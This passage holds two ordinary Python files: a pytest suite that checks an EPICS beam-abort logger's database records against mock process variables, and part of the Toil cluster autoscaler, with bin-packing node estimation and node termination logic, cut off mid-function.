test_aborttl.py

import threading
import time
from datetime import datetime
from collections import namedtuple
import pytest
from epics import PV
from epics.ca import CAThread
from aborttl.dbhandler import DbHandler
from aborttl.abortch import AbortCh
from aborttl.aborttl import Aborttl
Signal = namedtuple('Signal', ['abt_id', 'ts', 'pvname', 'msg',
'ring', 'reset', 'tcnt', 'acnt'
]
)
def insert_current_pv_mock(uri):
dh = DbHandler(uri)
conn = dh.engine.connect()
mock_pvs = [
{'pvname': 'ET_dummyHost:ABORTCH1', 'ring': 'HER'},
{'pvname': 'ET_dummyHost:ABORTCH2', 'ring': 'HER'},
{'pvname': 'ET_dummyHost:ABORTCH3', 'ring': 'HER'},
{'pvname': 'ET_dummyHost:ABORTCH4', 'ring': 'LER'},
{'pvname': 'ET_dummyHost:ABORTCH5', 'ring': 'LER'}
]
mock_cpvs = [
{'pvname': 'ET_dummyHost:ABORTCH1', 'msg': 'msg 1'},
{'pvname': 'ET_dummyHost:ABORTCH2', 'msg': 'msg 2'},
{'pvname': 'ET_dummyHost:ABORTCH3', 'msg': 'msg 3'},
{'pvname': 'ET_dummyHost:ABORTCH4', 'msg': 'msg 4'},
{'pvname': 'ET_dummyHost:ABORTCH5', 'msg': 'msg 5'}
]
conn.execute(dh.tables['pvs'].insert(), mock_pvs)
conn.execute(dh.tables['current_pvs'].insert(), mock_cpvs)
conn.close()
return dh
def clear_ch(ch_num):
name = "ET_dummyHost:ABORTCH" + str(ch_num)
pv_abort = PV(name)
pv_acnt = PV(name + ':ACNT')
pv_tcnt = PV(name + ':TCNT')
pv_sec = PV(name + ':TIME_SEC')
pv_nsec = PV(name + ':TIME_NANO')
pv_abort.put(0, wait=True)
pv_acnt.put(0, wait=True)
pv_tcnt.put(0, wait=True)
pv_sec.put(0, wait=True)
pv_nsec.put(0, wait=True)
def put_abort_ch(ch_num, acnt, tcnt, _t=None):
t = time.time() if _t is None else _t
name = "ET_dummyHost:ABORTCH" + str(ch_num)
t_sec, t_nano = ("%.9f" % t).split(".")
pv_abort = PV(name)
pv_acnt = PV(name + ':ACNT')
pv_tcnt = PV(name + ':TCNT')
pv_sec = PV(name + ':TIME_SEC')
pv_nsec = PV(name + ':TIME_NANO')
pv_abort.put(1, wait=True)
pv_acnt.put(acnt, wait=True)
pv_tcnt.put(tcnt, wait=True)
pv_sec.put(int(t_sec), wait=True)
pv_nsec.put(int(t_nano), wait=True)
dt = datetime.fromtimestamp(int(t_sec))
return '{}.{}'.format(dt.isoformat(' '), t_nano)
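# Note: put_abort_ch() returns the timestamp it wrote to the PVs as a string of the form
# 'YYYY-MM-DD HH:MM:SS.<nanoseconds>' (local time, since datetime.fromtimestamp() is used
# above); check_signals() later compares this string against the 'ts' column returned by
# fetch_abort_signals().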
def abort_reset():
pv = PV('ET_dummyHost:RESETw')
pv.put(1, wait=True)
time.sleep(1.1)
def check_signals(ss_test, ss_db):
assert len(ss_test) == len(ss_db)
for s_test, s_db in zip(ss_test, ss_db):
err_msg = '{} = {}'.format(s_db, s_test)
assert s_db['abt_id'] == s_test.abt_id, err_msg
assert s_db['ts'] == s_test.ts, err_msg
assert s_db['pvname'] == s_test.pvname, err_msg
assert s_db['msg'] == s_test.msg, err_msg
assert s_db['ring'] == s_test.ring, err_msg
assert s_db['reset_cnt'] == s_test.reset, err_msg
assert s_db['trg_cnt'] == s_test.tcnt, err_msg
assert s_db['int_cnt'] == s_test.acnt, err_msg
def set_initial_abort_state():
put_abort_ch(3, 0, 0)
put_abort_ch(5, 0, 0)
@pytest.fixture(scope='module')
def atl(softioc, caclient, tmpdir_factory):
AbortCh.fields['ACNT'] = ':ACNT'
AbortCh.fields['TCNT'] = ':TCNT'
dburi = ('sqlite:///' +
str(tmpdir_factory.mktemp('data').join('testdata.db'))
)
insert_current_pv_mock(dburi)
set_initial_abort_state()
atl = Aborttl(dburi, 'ET_dummyHost:RESETw')
thread = CAThread(target=atl.run)
thread.daemon = True
thread.start()
time.sleep(5)
yield atl
atl.stop()
thread.join()
time.sleep(1)
def test_initial_abort(softioc, caclient, atl):
t1 = put_abort_ch(1, 0, 0)
t2 = put_abort_ch(2, 1, 0)
time.sleep(2)
abort_reset()
clear_ch(1)
time.sleep(6)
put_abort_ch(1, 0, 1)
t4 = put_abort_ch(4, 2, 1)
put_abort_ch(1, 1, 1)
time.sleep(2)
signals = atl._dh.fetch_abort_signals(include_no_abt_id=True)
ss = [Signal(None, t1, 'ET_dummyHost:ABORTCH1', 'msg 1', 'HER', 0, 0, 0),
Signal(None, t2, 'ET_dummyHost:ABORTCH2', 'msg 2', 'HER', 0, 0, 1),
Signal(None, t4, 'ET_dummyHost:ABORTCH4', 'msg 4', 'LER', 1, 1, 2)]
check_signals(ss, signals)
for i in range(5):
clear_ch(i+1)
time.sleep(1)
def test_single_ring_abort(softioc, caclient, atl):
t1 = put_abort_ch(1, 0, 0)
t2 = put_abort_ch(2, 1, 0)
time.sleep(2)
abort_reset()
clear_ch(1)
time.sleep(6)
put_abort_ch(1, 0, 1)
t3 = put_abort_ch(3, 1, 1)
t4 = put_abort_ch(4, 2, 1)
put_abort_ch(1, 1, 1)
t5 = put_abort_ch(5, 1, 2)
time.sleep(2)
signals = atl._dh.fetch_abort_signals()
ss = [Signal(1, t1, 'ET_dummyHost:ABORTCH1', 'msg 1', 'HER', 0, 0, 0),
Signal(1, t2, 'ET_dummyHost:ABORTCH2', 'msg 2', 'HER', 0, 0, 1),
Signal(1, t3, 'ET_dummyHost:ABORTCH3', 'msg 3', 'HER', 1, 1, 1),
Signal(2, t4, 'ET_dummyHost:ABORTCH4', 'msg 4', 'LER', 0, 1, 2),
Signal(2, t5, 'ET_dummyHost:ABORTCH5', 'msg 5', 'LER', 0, 2, 1)]
check_signals(ss, signals)
for i in range(5):
clear_ch(i+1)
time.sleep(1)
def test_both_ring_abort(softioc, caclient, atl):
init_time = time.time()
init_dt = datetime.fromtimestamp(init_time)
time.sleep(1)
t1 = put_abort_ch(1, 0, 0)
t2 = put_abort_ch(2, 1, 0)
time.sleep(1)
abort_reset()
clear_ch(1)
time.sleep(1)
put_abort_ch(1, 0, 1)
t3 = put_abort_ch(3, 1, 1)
t4 = put_abort_ch(4, 2, 1)
put_abort_ch(1, 1, 1)
t5 = put_abort_ch(5, 1, 2)
time.sleep(2)
signals = atl._dh.fetch_abort_signals(astart=init_dt.isoformat(' '))
ss = [Signal(3, t1, 'ET_dummyHost:ABORTCH1', 'msg 1', 'HER', 0, 0, 0),
Signal(3, t2, 'ET_dummyHost:ABORTCH2', 'msg 2', 'HER', 0, 0, 1),
Signal(3, t3, 'ET_dummyHost:ABORTCH3', 'msg 3', 'HER', 1, 1, 1),
Signal(3, t4, 'ET_dummyHost:ABORTCH4', 'msg 4', 'LER', 1, 1, 2),
Signal(3, t5, 'ET_dummyHost:ABORTCH5', 'msg 5', 'LER', 1, 2, 1)]
check_signals(ss, signals)
for i in range(5):
clear_ch(i+1)
time.sleep(1)
def test_new_faster_abort(softioc, caclient, atl):
init_time = time.time()
init_dt = datetime.fromtimestamp(init_time)
time.sleep(1)
t1_time = time.time()
time.sleep(1)
mid_time = time.time()
mid_dt = datetime.fromtimestamp(mid_time)
time.sleep(1)
t2 = put_abort_ch(2, 0, 1)
time.sleep(1)
t1 = put_abort_ch(1, 0, 0, t1_time)
time.sleep(1)
t3 = put_abort_ch(3, 1, 1)
time.sleep(2)
signals = atl._dh.fetch_abort_signals(astart=mid_dt.isoformat(' '))
assert signals == []
signals = atl._dh.fetch_abort_signals(astart=init_dt.isoformat(' '))
ss = [Signal(4, t1, 'ET_dummyHost:ABORTCH1', 'msg 1', 'HER', 0, 0, 0),
Signal(4, t2, 'ET_dummyHost:ABORTCH2', 'msg 2', 'HER', 0, 1, 0),
Signal(4, t3, 'ET_dummyHost:ABORTCH3', 'msg 3', 'HER', 0, 1, 1)]
check_signals(ss, signals)
for i in range(5):
clear_ch(i+1)
time.sleep(1)
def test_timestamp_update_later(softioc, caclient, atl):
init_time = time.time()
init_dt = datetime.fromtimestamp(init_time)
put_abort_ch(1, 0, 0, 0)
time.sleep(1)
clear_ch(1)
t1 = put_abort_ch(1, 0, 0)
time.sleep(2)
signals = atl._dh.fetch_abort_signals(astart=init_dt.isoformat(' '))
ss = [Signal(5, t1, 'ET_dummyHost:ABORTCH1', 'msg 1', 'HER', 0, 0, 0)]
check_signals(ss, signals)
for i in range(5):
clear_ch(i+1)
time.sleep(1)

clusterScaler.py

# Copyright (C) 2015-2016 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import json
import logging
import os
from collections import deque
from threading import Lock
import time
from bd2k.util.exceptions import require
from bd2k.util.retry import retry
from bd2k.util.threading import ExceptionalThread
from bd2k.util.throttle import throttle
from itertools import islice
from toil.batchSystems.abstractBatchSystem import AbstractScalableBatchSystem, NodeInfo
from toil.common import Config
from toil.provisioners.abstractProvisioner import AbstractProvisioner, Shape
logger = logging.getLogger(__name__)
# A *deficit* exists when we have more jobs that can run on preemptable nodes than we have
# preemptable nodes. In order not to block these jobs, we want to increase the number of
# non-preemptable nodes beyond what we need for just the non-preemptable jobs. However, we may
# still prefer waiting for preemptable instances to become available.
#
# To accommodate this, we set the deficit to the difference between the number of preemptable
# nodes that were requested and the number actually provisioned. When the non-preemptable
# thread wants to provision nodes, it multiplies this deficit by a configured preference for
# preemptable vs. non-preemptable nodes.
_preemptableNodeDeficit = 0
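# A minimal sketch (the name below is illustrative only and not part of the module API) of how
# the deficit is consumed by the non-preemptable scaler in ScalerThread.tryRun() further down:
# the number of extra non-preemptable nodes requested is the deficit scaled by the configured
# preemptableCompensation preference.
def _compensationNodesExample(preemptableNodeDeficit, preemptableCompensation):
    # e.g. a deficit of 4 preemptable nodes with a 0.5 preference yields 2 extra nodes
    return int(round(preemptableNodeDeficit * preemptableCompensation))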
class RecentJobShapes(object):
"""
Used to track the 'shapes' of the last N jobs run (see Shape).
"""
def __init__(self, config, nodeShape, N=1000):
        # As a prior we start off with 10 jobs, each with the default memory, cores, and disk. To
        # estimate the running time we use the default wall time of each node allocation,
        # so that one job will fill the time per node.
self.jobShapes = deque(maxlen=N,
iterable=10 * [Shape(wallTime=nodeShape.wallTime,
memory=config.defaultMemory,
cores=config.defaultCores,
disk=config.defaultDisk)])
# Calls to add and getLastNJobShapes may be concurrent
self.lock = Lock()
# Number of jobs to average over
self.N = N
def add(self, jobShape):
"""
Adds a job shape as the last completed job.
:param Shape jobShape: The memory, core and disk requirements of the completed job
"""
with self.lock:
self.jobShapes.append(jobShape)
def get(self):
"""
Gets the last N job shapes added.
"""
with self.lock:
return list(self.jobShapes)
def binPacking(jobShapes, nodeShape):
"""
    Use a first-fit decreasing (FFD) bin-packing-like algorithm to calculate an approximate
    minimum number of nodes that will fit the given list of jobs.
:param Shape nodeShape: The properties of an atomic node allocation, in terms of wall-time,
memory, cores and local disk.
:param list[Shape] jobShapes: A list of shapes, each representing a job.
    Let a *node reservation* be an interval of time that a node is reserved for; it is defined
    by an integer number of node allocations.
    For a node reservation, its *jobs* are the set of jobs that will be run within the node
    reservation.
    A minimal node reservation has time equal to one atomic node allocation, or the minimum
    number of node allocations needed to run the longest-running job among its jobs.
:rtype: int
:returns: The minimum number of minimal node allocations estimated to be required to run all
the jobs in jobShapes.
"""
logger.debug('Running bin packing for node shape %s and %s job(s).', nodeShape, len(jobShapes))
    # Sort in descending order from largest to smallest. The FFD-like strategy will pack the
    # jobs in order from longest to shortest.
jobShapes.sort()
jobShapes.reverse()
assert len(jobShapes) == 0 or jobShapes[0] >= jobShapes[-1]
class NodeReservation(object):
"""
        Represents a node reservation. To represent the resources available within it, a node
        reservation is represented as a linked sequence of Shapes, each giving the resources
        free within a given interval of time.
"""
def __init__(self, shape):
# The wall-time and resource available
self.shape = shape
# The next portion of the reservation
self.nReservation = None
nodeReservations = [] # The list of node reservations
for jS in jobShapes:
def addToReservation():
"""
Function adds the job, jS, to the first node reservation in which it will fit (this
is the bin-packing aspect)
"""
def fits(x, y):
"""
Check if a job shape's resource requirements will fit within a given node allocation
"""
return y.memory <= x.memory and y.cores <= x.cores and y.disk <= x.disk
def subtract(x, y):
"""
Adjust available resources of a node allocation as a job is scheduled within it.
"""
return Shape(x.wallTime, x.memory - y.memory, x.cores - y.cores, x.disk - y.disk)
def split(x, y, t):
"""
Partition a node allocation into two
"""
return (Shape(t, x.memory - y.memory, x.cores - y.cores, x.disk - y.disk),
NodeReservation(Shape(x.wallTime - t, x.memory, x.cores, x.disk)))
i = 0 # Index of node reservation
while True:
# Case a new node reservation is required
if i == len(nodeReservations):
x = NodeReservation(subtract(nodeShape, jS))
nodeReservations.append(x)
t = nodeShape.wallTime
while t < jS.wallTime:
y = NodeReservation(x.shape)
t += nodeShape.wallTime
x.nReservation = y
x = y
return
# Attempt to add the job to node reservation i
x = nodeReservations[i]
y = x
t = 0
while True:
if fits(y.shape, jS):
t += y.shape.wallTime
# If the jS fits in the node allocation from x to y
if t >= jS.wallTime:
t = 0
while x != y:
x.shape = subtract(x.shape, jS)
t += x.shape.wallTime
x = x.nReservation
assert x == y
assert jS.wallTime - t <= x.shape.wallTime
if jS.wallTime - t < x.shape.wallTime:
x.shape, nS = split(x.shape, jS, jS.wallTime - t)
nS.nReservation = x.nReservation
x.nReservation = nS
else:
assert jS.wallTime - t == x.shape.wallTime
x.shape = subtract(x.shape, jS)
return
# If the job would fit, but is longer than the total node allocation
# extend the node allocation
elif y.nReservation == None and x == nodeReservations[i]:
# Extend the node reservation to accommodate jS
y.nReservation = NodeReservation(nodeShape)
else: # Does not fit, reset
x = y.nReservation
t = 0
y = y.nReservation
if y is None:
# Reached the end of the reservation without success so stop trying to
# add to reservation i
break
i += 1
addToReservation()
logger.debug("Done running bin packing for node shape %s and %s job(s) resulting in %s node "
"reservations.", nodeShape, len(jobShapes), len(nodeReservations))
return len(nodeReservations)
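# A minimal usage sketch for binPacking(), assuming the Shape signature used above
# (wallTime, memory, cores, disk). Ten half-node-length jobs that each need a quarter of a
# node's resources should pack into a small number of node reservations. This example
# function is illustrative only and is never called by the scaler.
def _binPackingExample():
    nodeShape = Shape(wallTime=3600, memory=32 * 1024 ** 3, cores=8, disk=100 * 1024 ** 3)
    jobShapes = [Shape(wallTime=1800, memory=8 * 1024 ** 3, cores=2, disk=25 * 1024 ** 3)
                 for _ in range(10)]
    return binPacking(jobShapes, nodeShape)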
class ClusterScaler(object):
def __init__(self, provisioner, leader, config):
"""
Class manages automatically scaling the number of worker nodes.
:param AbstractProvisioner provisioner: Provisioner instance to scale.
:param toil.leader.Leader leader:
:param Config config: Config object from which to draw parameters.
"""
self.provisioner = provisioner
self.leader = leader
self.config = config
# Indicates that the scaling threads should shutdown
self.stop = False
assert config.maxPreemptableNodes >= 0 and config.maxNodes >= 0
require(config.maxPreemptableNodes + config.maxNodes > 0,
'Either --maxNodes or --maxPreemptableNodes must be non-zero.')
self.preemptableScaler = ScalerThread(self, preemptable=True) if self.config.maxPreemptableNodes > 0 else None
self.scaler = ScalerThread(self, preemptable=False) if self.config.maxNodes > 0 else None
def start(self):
"""
Start the cluster scaler thread(s).
"""
if self.preemptableScaler != None:
self.preemptableScaler.start()
if self.scaler != None:
self.scaler.start()
def check(self):
"""
        Attempt to join any existing scaler threads that may have died or finished. This ensures
        that any exceptions raised in the threads are propagated in a timely fashion.
"""
exception = False
for scalerThread in [self.preemptableScaler, self.scaler]:
if scalerThread is not None:
try:
scalerThread.join(timeout=0)
except Exception as e:
logger.exception(e)
exception = True
if exception:
raise RuntimeError('The cluster scaler has exited due to an exception')
def shutdown(self):
"""
Shutdown the cluster.
"""
self.stop = True
for scaler in self.preemptableScaler, self.scaler:
if scaler is not None:
scaler.join()
def addCompletedJob(self, job, wallTime):
"""
        Adds the shape of a completed job to the queue, allowing the scaler to use the last N
        completed jobs in estimating how many nodes are required in the cluster.
        :param toil.job.JobNode job: The completed job, supplying its memory, core and disk requirements
:param int wallTime: The wall-time taken to complete the job in seconds.
"""
s = Shape(wallTime=wallTime, memory=job.memory, cores=job.cores, disk=job.disk)
if job.preemptable and self.preemptableScaler is not None:
self.preemptableScaler.jobShapes.add(s)
else:
self.scaler.jobShapes.add(s)
class ScalerThread(ExceptionalThread):
"""
A thread that automatically scales the number of either preemptable or non-preemptable worker
nodes according to the number of jobs queued and the resource requirements of the last N
completed jobs.
The scaling calculation is essentially as follows: Use the RecentJobShapes instance to
calculate how many nodes, n, can be used to productively compute the last N completed
jobs. Let M be the number of jobs issued to the batch system. The number of nodes
required is then estimated to be alpha * n * M/N, where alpha is a scaling factor used to
    adjust the balance between under- and over-provisioning the cluster.
At each scaling decision point a comparison between the current, C, and newly estimated
number of nodes is made. If the absolute difference is less than beta * C then no change
is made, else the size of the cluster is adapted. The beta factor is an inertia parameter
that prevents continual fluctuations in the number of nodes.
"""
def __init__(self, scaler, preemptable):
"""
:param ClusterScaler scaler: the parent class
"""
super(ScalerThread, self).__init__(name='preemptable-scaler' if preemptable else 'scaler')
self.scaler = scaler
self.preemptable = preemptable
self.nodeTypeString = ("preemptable" if self.preemptable else "non-preemptable") + " nodes" # Used for logging
# Resource requirements and wall-time of an atomic node allocation
self.nodeShape = scaler.provisioner.getNodeShape(preemptable=preemptable)
# Monitors the requirements of the N most recently completed jobs
self.jobShapes = RecentJobShapes(scaler.config, self.nodeShape)
# Minimum/maximum number of either preemptable or non-preemptable nodes in the cluster
self.minNodes = scaler.config.minPreemptableNodes if preemptable else scaler.config.minNodes
self.maxNodes = scaler.config.maxPreemptableNodes if preemptable else scaler.config.maxNodes
if isinstance(self.scaler.leader.batchSystem, AbstractScalableBatchSystem):
for preemptable in (True, False):
                # although this thread only deals with either preemptable or non-preemptable nodes,
                # the presence of any statically provisioned nodes affects both scaler threads, so we
                # will check for both preemptable and non-preemptable static nodes
nodes = self.scaler.leader.provisioner.getProvisionedWorkers(preemptable)
self.scaler.provisioner.setStaticNodes(nodes, preemptable)
if preemptable == self.preemptable:
self.totalNodes = len(nodes) if nodes else 0
else:
self.totalNodes = 0
        logger.info('Starting with %s %s in the cluster.', self.totalNodes, self.nodeTypeString)
self.stats = None
if scaler.config.clusterStats:
logger.debug("Starting up cluster statistics...")
self.stats = ClusterStats(self.scaler.leader.config.clusterStats,
self.scaler.leader.batchSystem,
self.scaler.provisioner.clusterName)
self.stats.startStats(preemptable=preemptable)
logger.debug("...Cluster stats started.")
def tryRun(self):
global _preemptableNodeDeficit
while not self.scaler.stop:
with throttle(self.scaler.config.scaleInterval):
self.totalNodes = len(self.scaler.leader.provisioner.getProvisionedWorkers(self.preemptable))
# Estimate the number of nodes to run the issued jobs.
# Number of jobs issued
queueSize = self.scaler.leader.getNumberOfJobsIssued(preemptable=self.preemptable)
# Job shapes of completed jobs
recentJobShapes = self.jobShapes.get()
assert len(recentJobShapes) > 0
# Estimate of number of nodes needed to run recent jobs
nodesToRunRecentJobs = binPacking(recentJobShapes, self.nodeShape)
# Actual calculation of the estimated number of nodes required
estimatedNodes = 0 if queueSize == 0 else max(1, int(round(
self.scaler.config.alphaPacking
* nodesToRunRecentJobs
* float(queueSize) / len(recentJobShapes))))
# Account for case where the average historical runtime of completed jobs is less
# than the runtime of currently running jobs. This is important
# to avoid a deadlock where the estimated number of nodes to run the jobs
# is too small to schedule a set service jobs and their dependent jobs, leading
# to service jobs running indefinitely.
# How many jobs are currently running and their average runtime.
numberOfRunningJobs, currentAvgRuntime = self.scaler.leader.getNumberAndAvgRuntimeOfCurrentlyRunningJobs()
# Average runtime of recently completed jobs
historicalAvgRuntime = sum(map(lambda jS : jS.wallTime, recentJobShapes))/len(recentJobShapes)
# Ratio of avg. runtime of currently running and completed jobs
runtimeCorrection = float(currentAvgRuntime)/historicalAvgRuntime if currentAvgRuntime > historicalAvgRuntime and numberOfRunningJobs >= estimatedNodes else 1.0
# Make correction, if necessary (only do so if cluster is busy and average runtime is higher than historical
# average)
if runtimeCorrection != 1.0:
estimatedNodes = int(round(estimatedNodes * runtimeCorrection))
if self.totalNodes < self.maxNodes:
logger.warn("Historical avg. runtime (%s) is less than current avg. runtime (%s) and cluster"
" is being well utilised (%s running jobs), increasing cluster requirement by: %s" %
(historicalAvgRuntime, currentAvgRuntime, numberOfRunningJobs, runtimeCorrection))
# If we're the non-preemptable scaler, we need to see if we have a deficit of
# preemptable nodes that we should compensate for.
if not self.preemptable:
compensation = self.scaler.config.preemptableCompensation
assert 0.0 <= compensation <= 1.0
# The number of nodes we provision as compensation for missing preemptable
# nodes is the product of the deficit (the number of preemptable nodes we did
# _not_ allocate) and configuration preference.
compensationNodes = int(round(_preemptableNodeDeficit * compensation))
if compensationNodes > 0:
                        logger.info('Adding %d non-preemptable nodes to compensate for a deficit of %d '
                                    'preemptable ones.', compensationNodes, _preemptableNodeDeficit)
estimatedNodes += compensationNodes
jobsPerNode = (0 if nodesToRunRecentJobs <= 0
else len(recentJobShapes) / float(nodesToRunRecentJobs))
if estimatedNodes > 0 and self.totalNodes < self.maxNodes:
logger.info('Estimating that cluster needs %s %s of shape %s, from current '
'size of %s, given a queue size of %s, the number of jobs per node '
'estimated to be %s, an alpha parameter of %s and a run-time length correction of %s.',
estimatedNodes, self.nodeTypeString, self.nodeShape,
self.totalNodes, queueSize, jobsPerNode,
self.scaler.config.alphaPacking, runtimeCorrection)
# Use inertia parameter to stop small fluctuations
delta = self.totalNodes * max(0.0, self.scaler.config.betaInertia - 1.0)
if self.totalNodes - delta <= estimatedNodes <= self.totalNodes + delta:
logger.debug('Difference in new (%s) and previous estimates in number of '
'%s (%s) required is within beta (%s), making no change.',
estimatedNodes, self.nodeTypeString, self.totalNodes, self.scaler.config.betaInertia)
estimatedNodes = self.totalNodes
# Bound number using the max and min node parameters
if estimatedNodes > self.maxNodes:
logger.debug('Limiting the estimated number of necessary %s (%s) to the '
'configured maximum (%s).', self.nodeTypeString, estimatedNodes, self.maxNodes)
estimatedNodes = self.maxNodes
elif estimatedNodes < self.minNodes:
logger.info('Raising the estimated number of necessary %s (%s) to the '
                                    'configured minimum (%s).', self.nodeTypeString, estimatedNodes, self.minNodes)
estimatedNodes = self.minNodes
if estimatedNodes != self.totalNodes:
logger.info('Changing the number of %s from %s to %s.', self.nodeTypeString, self.totalNodes,
estimatedNodes)
self.totalNodes = self.setNodeCount(numNodes=estimatedNodes, preemptable=self.preemptable)
# If we were scaling up the number of preemptable nodes and failed to meet
# our target, we need to update the slack so that non-preemptable nodes will
# be allocated instead and we won't block. If we _did_ meet our target,
# we need to reset the slack to 0.
if self.preemptable:
if self.totalNodes < estimatedNodes:
deficit = estimatedNodes - self.totalNodes
logger.info('Preemptable scaler detected deficit of %d nodes.', deficit)
_preemptableNodeDeficit = deficit
else:
_preemptableNodeDeficit = 0
if self.stats:
self.stats.checkStats()
self.shutDown(preemptable=self.preemptable)
logger.info('Scaler exited normally.')
def setNodeCount(self, numNodes, preemptable=False, force=False):
"""
        Attempt to grow or shrink the number of preemptable or non-preemptable worker nodes in
the cluster to the given value, or as close a value as possible, and, after performing
the necessary additions or removals of worker nodes, return the resulting number of
preemptable or non-preemptable nodes currently in the cluster.
:param int numNodes: Desired size of the cluster
:param bool preemptable: whether the added nodes will be preemptable, i.e. whether they
may be removed spontaneously by the underlying platform at any time.
:param bool force: If False, the provisioner is allowed to deviate from the given number
of nodes. For example, when downsizing a cluster, a provisioner might leave nodes
running if they have active jobs running on them.
        :rtype: int
        :return: the number of worker nodes in the cluster after making the necessary
                 adjustments. This value should be, but is not guaranteed to be, close or equal to
                 the `numNodes` argument. It represents the closest possible approximation of the
                 actual cluster size at the time this method returns.
"""
for attempt in retry(predicate=self.scaler.provisioner.retryPredicate):
with attempt:
workerInstances = self.getNodes(preemptable=preemptable)
numCurrentNodes = len(workerInstances)
delta = numNodes - numCurrentNodes
if delta > 0:
logger.info('Adding %i %s nodes to get to desired cluster size of %i.', delta, 'preemptable' if preemptable else 'non-preemptable', numNodes)
numNodes = numCurrentNodes + self._addNodes(numNodes=delta,
preemptable=preemptable)
elif delta < 0:
logger.info('Removing %i %s nodes to get to desired cluster size of %i.', -delta, 'preemptable' if preemptable else 'non-preemptable', numNodes)
numNodes = numCurrentNodes - self._removeNodes(workerInstances,
numNodes=-delta,
preemptable=preemptable,
force=force)
else:
logger.info('Cluster already at desired size of %i. Nothing to do.', numNodes)
return numNodes
def _addNodes(self, numNodes, preemptable):
return self.scaler.provisioner.addNodes(numNodes, preemptable)
def _removeNodes(self, nodeToNodeInfo, numNodes, preemptable=False, force=False):
# If the batch system is scalable, we can use the number of currently running workers on
# each node as the primary criterion to select which nodes to terminate.
if isinstance(self.scaler.leader.batchSystem, AbstractScalableBatchSystem):
            # ipMap maps private IP address -> provisioner Node
ipMap = {node.privateIP: node for node in nodeToNodeInfo.keys()}
def filterRemovableNodes(executorInfo):
return not bool(self.chooseNodes({ipMap.get(executorInfo.nodeAddress): executorInfo.nodeInfo},
preemptable=preemptable))
with self.scaler.leader.batchSystem.nodeFiltering(filterRemovableNodes):
# while this context manager is active, the batch system will not launch any
                # new tasks on nodes that are being considered for termination (as determined by the
# filterRemovableNodes method)
nodeToNodeInfo = self.getNodes(preemptable)
# Join nodes and instances on private IP address.
logger.debug('Nodes considered to terminate: %s', ' '.join(map(str, nodeToNodeInfo)))
nodesToTerminate = self.chooseNodes(nodeToNodeInfo, force, preemptable=preemptable)
nodesToTerminate = nodesToTerminate[:numNodes]
if logger.isEnabledFor(logging.DEBUG):
for instance in nodesToTerminate:
logger.debug("Instance %s is about to be terminated. It "
"would be billed again in %s minutes.",
instance, 60 * self.scaler.provisioner.remainingBillingInterval(instance))
nodeToNodeInfo = nodesToTerminate
else:
# Without load info all we can do is sort instances by time left in billing cycle.
nodeToNodeInfo = sorted(nodeToNodeInfo, key=self.scaler.provisioner.remainingBillingInterval)
nodeToNodeInfo = [instance for instance in islice(nodeToNodeInfo, numNodes)]
logger.info('Terminating %i instance(s).', len(nodeToNodeInfo))
if nodeToNodeInfo:
self.scaler.provisioner.terminateNodes(nodeToNodeInfo)
return len(nodeToNodeInfo)
def chooseNodes(self, nodeToNodeInfo, force=False, preemptable=False):
        # Unless forced, exclude nodes with running workers. Note that it is possible for
# the batch system to report stale nodes for which the corresponding instance was
# terminated already. There can also be instances that the batch system doesn't have
# nodes for yet. We'll ignore those, too, unless forced.
nodesToTerminate = []
for node, nodeInfo in nodeToNodeInfo.items():
if node is None:
logger.info("Node with info %s was not found in our node list", nodeInfo)
continue
staticNodes = self.scaler.provisioner.getStaticNodes(preemptable)
prefix = 'non-' if not preemptable else ''
if node.privateIP in staticNodes:
# we don't want to automatically terminate any statically
# provisioned nodes
logger.debug("Found %s in %spreemptable static nodes", node.privateIP, prefix)
continue
else:
logger.debug("Did not find %s in %spreemptable static nodes", node.privateIP, prefix)
pass
if force:
nodesToTerminate.append((node, nodeInfo))
elif nodeInfo is not None and nodeInfo.workers < 1:
nodesToTerminate.append((node, nodeInfo))
else:
logger.debug('Not terminating instances %s. Node info: %s', node, nodeInfo)
# Sort nodes by number of workers and time left in billing cycle
nodesToTerminate.sort(key=lambda ((node, nodeInfo)): (
nodeInfo.workers if nodeInfo else 1,
self.scaler.provisioner.remainingBillingInterval(node))
)
if not force:
# don't terminate nodes that still have > 15% left in their allocated (prepaid) time
nodesToTerminate = [node for node in nodesToTerminate if
self.scaler.provisioner.remainingBillingInterval(node) <= 0.15]
return [node for node,_ in nodesToTerminate]
def getNodes(self, preemptable):
"""
Returns a dictionary mapping node identifiers of preemptable or non-preemptable nodes to
NodeInfo objects, one for each node.
        This method is the definitive source on nodes in the cluster and is responsible for
        consolidating cluster state between the provisioner and the batch system.
:param bool preemptable: If True (False) only (non-)preemptable nodes will be returned.
If None, all nodes will be returned.
:rtype: dict[Node, NodeInfo]
"""
def _getInfo(allMesosNodes, ip):
info = None
try:
info = allMesosNodes[ip]
except KeyError:
# never seen by mesos - 1 of 3 possibilities:
# 1) node is still launching mesos & will come online soon
# 2) no jobs have been assigned to this worker. This means the executor was never
# launched, so we don't even get an executorInfo back indicating 0 workers running
# 3) mesos crashed before launching, worker will never come online
# In all 3 situations it's safe to fake executor info with 0 workers, since in all
# cases there are no workers running. We also won't waste any money in cases 1/2 since
# we will still wait for the end of the node's billing cycle for the actual
# termination.
info = NodeInfo(coresTotal=1, coresUsed=0, requestedCores=0,
memoryTotal=1, memoryUsed=0, requestedMemory=0,
workers=0)
else:
# Node was tracked but we haven't seen this in the last 10 minutes
inUse = self.scaler.leader.batchSystem.nodeInUse(ip)
if not inUse:
# The node hasn't reported in the last 10 minutes & last we know
# there weren't any tasks running. We will fake executorInfo with no
# worker to reflect this, since otherwise this node will never
# be considered for termination
info.workers = 0
else:
pass
# despite the node not reporting to mesos jobs may still be running
# so we can't terminate the node
return info
allMesosNodes = self.scaler.leader.batchSystem.getNodes(preemptable, timeout=None)
recentMesosNodes = self.scaler.leader.batchSystem.getNodes(preemptable)
provisionerNodes = self.scaler.provisioner.getProvisionedWorkers(preemptable)
if len(recentMesosNodes) != len(provisionerNodes):
logger.debug("Consolidating state between mesos and provisioner")
nodeToInfo = {}
# fixme: what happens if awsFilterImpairedNodes is used?
        # if this assertion is false it means that user-managed nodes are being
        # used that are outside the provisioner's control;
        # this would violate many basic assumptions in autoscaling, so it is currently not allowed
for node, ip in ((node, node.privateIP) for node in provisionerNodes):
info = None
